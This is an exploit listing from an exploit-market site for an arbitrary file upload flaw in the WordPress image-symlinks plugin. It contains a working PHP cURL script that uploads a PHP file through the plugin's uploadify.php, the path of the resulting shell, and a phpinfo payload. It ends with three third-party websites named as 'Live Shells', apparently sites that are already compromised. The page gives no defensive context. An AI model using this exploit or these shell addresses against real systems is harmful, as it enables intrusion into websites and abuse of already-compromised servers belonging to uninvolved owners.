[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress image-symlinks Plugin Arbitrary File Upload Vulnerability

Author
brunox
Risk
[
Security Risk High
]
0day-ID
0day-ID-22364
Category
web applications
Date add
24-06-2014
Platform
php
#=> Exploit  :

<?php

 

$uploadfile="Bruno.php";

$ch = curl_init("http://localhost/wordpress/wp-content/plugins/image-symlinks/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",

              'folder'=>'/wp-content/plugins/image-symlinks/uploadify/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

 

  print "$postResult";

?> 


Shell Access :   http://localhost/wp-content/image-symlinks/uploadify/random_name.php


<?php
phpinfo();
?>


====================================

Examples  :  ( Live Shells ) 

1 - http://www.scuboutique.com/wp-content/uploads/image-symlinks/uploadify/hun.php

2- http://datadriven.info/wp-content/uploads/image-symlinks/uploadify/hun.php


3- http://www.inlan.fr//wp-content/uploads/image-symlinks/uploadify/hun.php

#  0day.today [2024-11-15]  #